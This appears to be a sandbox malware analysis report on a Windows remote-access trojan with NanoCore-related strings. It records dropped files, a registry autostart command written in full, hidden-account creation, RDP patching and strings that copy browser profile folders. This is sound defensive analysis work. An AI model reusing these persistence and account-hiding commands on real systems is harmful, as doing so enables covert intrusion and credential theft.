Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32

Source: C:\ProgramData\images.exe

File written: C:\Program Files\Microsoft DN1\rdpwrap.ini

Jump to behavior

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Directory created: C:\Program Files\Microsoft DN1	Jump to behavior
Source: C:\ProgramData\images.exe	Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to behavior
Source: C:\ProgramData\images.exe	Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini	Jump to behavior

Source: Xjf4yH9N2t.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Xjf4yH9N2t.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Xjf4yH9N2t.exe

Static file information: File size 1309184 > 1048576

Source: Xjf4yH9N2t.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x131e00

Source: Xjf4yH9N2t.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Xjf4yH9N2t.exe, 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, images.exe, 00000016.00000003.295362829.0000000000E39000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: KetqqsbuJ.exe, 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
Source:	Binary string: RfxVmt.pdb source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: images.exe, 00000016.00000003.313698047.00000000049CB000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: KetqqsbuJ.exe, 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: KetqqsbuJ.exe, 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdbUGP source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: KetqqsbuJ.exe, 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: KetqqsbuJ.exe, 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\ProgramData\images.exe

Unpacked PE file: 22.2.images.exe.4240000.5.unpack

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 5_2_00084625 push esi; ret
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 6_2_000F4625 push esi; ret
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_004011C0 push eax; ret
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_004011C0 push eax; ret
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0041C225 pushad ; retn 0041h
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_004174D1 push ebp; retf
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00417570 push ebp; retf
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00764625 push esi; ret
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_004F4625 push ds; ret
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEE0F0 push edx; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEE36F push edx; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEE349 push edx; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEE471 push ebx; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BE8A70 push ss; retn B402h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BE8A61 push ss; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEEDB9 push esi; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BEED89 push esi; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BE93D9 push ds; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BE9660 push ds; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BE7A80 push cs; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_02BE7A71 push cs; retn 0002h
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_050AB5EC push eax; retf
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Code function: 40_2_050A69F8 pushad ; retf

Source: initial sample	Static PE information: section name: .text entropy: 7.55041675876
Source: initial sample	Static PE information: section name: .text entropy: 7.55041675876
Source: initial sample	Static PE information: section name: .text entropy: 7.57991184815
Source: initial sample	Static PE information: section name: .text entropy: 7.57991184815
Source: initial sample	Static PE information: section name: .text entropy: 7.57991184815

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040290E URLDownloadToFileW,ShellExecuteW,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	File created: C:\ProgramData\images.exe	Jump to dropped file
Source: C:\ProgramData\images.exe	File created: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to dropped file
Source: C:\ProgramData\images.exe	File created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Jump to dropped file
Source: C:\ProgramData\images.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\SysWOW64\reg.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load

Jump to behavior

Source: C:\Windows\system32\drivers\tsusbhub.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf

Jump to behavior

Source: C:\ProgramData\images.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

Jump to behavior

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts

Show sources

Source: Xjf4yH9N2t.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Xjf4yH9N2t.exe, 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	File opened: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe:Zone.Identifier read attributes \| delete

Hides user accounts

Show sources

Source: C:\ProgramData\images.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList jjIFKkt

Jump to behavior

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
